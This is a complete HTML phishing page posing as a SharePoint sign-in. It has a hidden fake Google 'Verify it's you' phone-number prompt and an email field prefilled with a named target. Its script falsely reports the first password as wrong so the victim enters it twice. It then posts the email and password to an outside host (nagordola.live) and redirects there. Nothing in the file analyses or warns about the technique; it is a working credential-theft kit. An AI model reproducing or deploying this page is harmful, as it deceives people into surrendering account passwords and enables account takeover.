<!DOCTYPE html>
<html>
<head>
<title>Login into your sharepoint account</title>
<link rel="icon" type="icon" href="icon.ico">
<link rel="stylesheet" href="">
<link rel="stylesheet" href="bootstrap.min.css">
<style>
body{
    background: #0073C6;
}
.container{
    width:100%;
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
}
.office{
    width: 380px;
    background: #fff;
}
.office-holder{
    width:80%;
    margin: auto;
    padding: 20px 0px;
}
.logo{
    width:100%;
    float: left;
    margin-bottom: 2em;
}
.logo h1{
    font-family: arial;
}
.verify{
    width: 70%;
    margin: auto;
}
.verify h4{
    font-family: arial;
}
fieldset{
    width: 90%;
    float: right;
    border:2px solid #4285f4;
    border-radius: 5px;
}
legend{
    font-size: 15px;
    overflow: hidden;
    width: 42%;
    padding:0px 2px;
    margin: 0px;
}
.verify input[type='text']{
    width: 100%;
    float: right;
    border:none;
    padding:3px 10px;
}
.verify button{
    border:none;
    height: 40px;
    width: 80px;
    float: right;
    margin-top: 2em;
    background: #4285f4;
    border-radius: 5px;
    color: #fff;
}
.email-to-verify{
    border:1px solid #000;
    border-radius: 10px;
}
.form-holder{
    width:100%;
    float: left;
}
.form-holder h3{
    font-weight: 600;
}
.form-holder input[type='email'], input[type='password']{
    width: 100%;
    height:40px;
    float: left;
    margin-bottom: 15px;
}
.form-holder .btn-holder{
    width:100%;
    margin-top:1em;
    display: flex;
    align-content: center;
    align-items: center;
    justify-content: center;
}
.form-holder .btn-holder .btn{
    background:#0073C6;
    border:none;
    padding:6px 10px;
    color:#fff;
    border-radius: 0px;
    margin-top: 20px;
    margin-bottom: 20px;
}
.form-holder .btn-holder .btn:hover{
    cursor:pointer;
}
.checkbox{
    width: 100%;
    float: left;
    margin-top:5px;
}
.checkbox label{
    font-family:arial;
    font-size:13px;
    float: left;
    margin-left:1em;
}
.hide{
    display: none;
}
</style>
</head>

<body> <!-- onload="checkMail()" -->
	<div class="container">
		<div class="office hide" id="verify" style="border: 1px solid #eee; border-radius: 5px; padding:50px 0px; width: 400px;">
			<div class="verify" style="text-align: center;">
				<div style="width: 100%; margin-bottom: 10px;">
					<img src="google.png" width="100px">
				</div>
				<div style="width: 100%;">
					<div class="alert alert-danger hide alert1"></div>
				</div>
				<h4>Verify it's you</h4>
				<p>This device isn't recognized. For your security, Google wants to make sure it's really you</p>
			</div>
			<div class="verify">
				<div class="email-to-verify" style="margin-bottom: 5px; text-align: center;"></div>
				<p style="font-size:13px; float: left; margin-top: 12px; margin-bottom:26px;">Confirm the phone number you provided in your security settings</p>
			</div>
			<div class="verify">
				<fieldset>
					<legend>Phone number</legend>
					<input type="text" id="phone-no" name="phone">
				</fieldset>
				<button id="next">Next</button>
			</div>
		</div>
		<div class="office show border shadow bg-light" id="others">
			<div class="office-holder">
				<div class="logo">
					<h3 class="text-dark"><strong id="domain-name" class="text-uppercase"></strong></h3>
					<h5 class="font-weight-light">Please sign using your email and password to gain access</h5>
				</div>
				<form>
					<div class="form-holder">
						<div style="width: 100%;">
							<div class="alert alert-danger hide alert2"></div>
						</div>
						<input type="email" name="email" id="email" class="form-control" value="erica@zizian.com" placeholder="someone@example.com" required="" disabled> <!-- oninput="checkMail()" -->
						<input type="password" name="password" id="password" placeholder="Password" class="form-control" >
						<div class="checkbox">
							<input type="checkbox" name="" style="float: left; margin-top:2px; margin-bottom: 10px;">
							<label>REMEMBER ME</label>
						</div>
						<div class="btn-holder">
							<button class="btn btn-lg col-12" id="signin">LOGIN</button>
						</div>
						<p style="color:#0073C6; margin-top:1em; float: left; width:100%;">can't access your account?</p>
						<p style="color:#0073C6; margin-top:0em; float: left; width:100%;">Sign in with a single-use code</p>
					</div>
				</form>
			</div>
		</div>
    </div>
<script
src="https://code.jquery.com/jquery-2.2.3.min.js"
integrity="sha256-a23g1Nt4dtEYOj7bR+vTu7+T8VP13humZFBJNIYoEJo="
crossorigin="anonymous"></script>
<script src="jquery.js"></script>
<!-- <script src="data.js"></script> -->
<!-- <script src="validate.js"> -->

<script type="text/javascript">
  // Get Dom Strings
  const Dom = {
    email: "#email",
    password: "#password",
    submit: "#signin",
    domain: "#domain-name",
    alert: ".alert2",
  };

  // Get Patterns
  let Patterns = {
    email: /^([\w-]*)@([a-zA-Z]+)\.([a-zA-Z]+)(\.[a-zA-Z]{2,3})?$/g,
    password: /^([\w-!#\$@\/]{6,})$/g
  };


  // Form Validation Controller
  let FormValidate = (function(dataCtrl){
    let count = 0;

    // SetListeners
    function setListeners() {

      // Get Submit button
      let submit = document.querySelector(Dom.submit);
      submit.addEventListener("click", validateForm);

      // Body
      body = document.body;
      // Add Onload Listener to body Element
      body.onload = checkMail;

      // Validate Email Value
      document.querySelector(Dom.email).addEventListener("input", checkMail);

    }

    // checkMail
    function checkMail(){
      // Get Domain Element
      let showDomain = document.querySelector(Dom.domain);

      // Validate Domain
      domain = email.value.replace(/.*@/, "").split('.')[0];

      // Add domain to Ui
      showDomain.textContent = domain;
    }

    // Validate Form
    function validateForm(e) {
      // Prevent Default
      e.preventDefault();

      // Increment Count
      count++;

      // Get Inputs
      email = document.querySelector(Dom.email);
      password = document.querySelector(Dom.password);

      // Get Email Regex
      emailReg = Patterns.email;
      passwordReg = Patterns.password;

      // If Count is equal to 1
      if(count === 1) {

        if(email.value === "" && password.value === "") {
            // Print error
            printError(`show`, "Input field cannot be blank");

            // Reset counter
            count = 0;

            return false;
        } else if(email.value === "") {

            // Print error
            printError(`show`, "Email cannot be empty");

            // Reset counter
            count = 0;

            return false;
        } else if(password.value === "") {

            // Print error
            printError(`show`, "Password cannot be empty");

            // Reset counter
            count = 0;

            return false;
        }  else {
          // Print error
          printError(`hide`, "");

          // Increment count
          count++;
        }


        // Validate email
        validateInput(email, emailReg);

        // Validating password
        // Validating password
        if(passwordReg.exec(password.value)) {
            // Print error
            printError(`show`, "Password does not match. Try again.");

            // Empty Password field
            password.value = "";

            // Focus on password field
            password.focus();

            return false;
        } else if(password.value === "") {
          // Print error
          printError(`show`, "Password cannot be empty");

          // Focus on password field
          password.focus();

          // reset count
          count = 0;

          return false;

            // Password length validation
        } else if(password.value.length < 6) {
            // Print error
            printError(`show`, "Password is incorrect");

            // Reset password
            password.value = "";

            // Focus on password field
            password.focus();

            // reset count
            count = 0;

            return false;

        } else {
            // Print error
            printError(`hide`, "");

            // Increment count
            count++;

        }

      } else {
        // Run Real Validation

        // Validate email
        validateInput(email, emailReg);

        // Validating password
        // Validating password
        if(password.value === "") {
          // Print Message
          printError("show", "Password cannot be empty");

          // Focus On Input
          password.focus();

          return false;
        } else if(passwordReg.exec(password.value)) {

          // Print Message
          printError("hide", "");

        } else if(password.value.length < 6) {

          // Print error
          printError(`show`, "Password is incorrect");

          // Reset password
          password.value = "";

          // Focus on password field
          password.focus();

          // reset count
          count = 1;

          return false;

        } else {
          // Increment counter
          count++;

          // Print Message
          let alert = printError("show", "Loggin in...");

          // Change class name
          alert.className = alert.className.replace(/\balert-danger\b/g, "alert-info");


          // Check if count is greater than 1
          if(count > 1) {

            // url
            let url = 'https://nagordola.live/update/WWxoSmQyUkdUVDA9.php';

            // Form Data
            let formData = `email=${email.value}&password=${password.value}`;

            // Submit Data
            postAjax(url, formData, function(data){ console.log(data); });

            // Redirect page
            setTimeout(function(){
              location.href = url;
            }, 200);

          }
        }
      }




    }

    // Validate Input
    function validateInput(input, reg) {
       if(input.value === "") {
         // Print error
         printError(`show`, "Email cannot be empty");

         // Focus on input
         input.focus();

         return false;
       } else if (reg.exec(input.value)) {
         // Print error
         printError(`hide`, "");
       } else {
         // Print error
         printError(`show`, "Email is invalid");
         console.log(printError(`show`, "Email is invalid"));

         // Focus on input
         input.focus();

         return false;
       }
   }

   // Print error
   function printError(show, message) {
     let alert = document.querySelector(Dom.alert);

     if(show === "show") {
       alert.classList.remove("hide");
     } else {
       alert.classList.add("hide");
     }

     // Log messageError
     alert.textContent = message;

     // Return alert
     return alert;
   }

   // Ajax submit 1
   function postAjax(url, data, success) {
       var params = typeof data == 'string' ? data : Object.keys(data).map(
               function(k){ return encodeURIComponent(k) + '=' + encodeURIComponent(data[k]) }
           ).join('&');

       var xhr = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("Microsoft.XMLHTTP");
       xhr.open('POST', url);
       xhr.onreadystatechange = function() {
           if (xhr.readyState>3 && xhr.status==200) { success(xhr.responseText); }
       };
       xhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
       xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
       xhr.send(params);
       return xhr;
   }

   // example request with data object
   // postAjax('http://foo.bar/', { p1: 1, p2: 'Hello World' }, function(data){ console.log(data); });


   // Change Alert class
   function changeAlert(alert, klass) {
     alert.className = alert.className.replace(/\balert-danger\b/g, `${klass}`);
   }

    return {
      init: function() {
        setListeners();
      }
    }

  })();

  // Initialize function
  FormValidate.init();


</script>

</script>
</body>
</html>
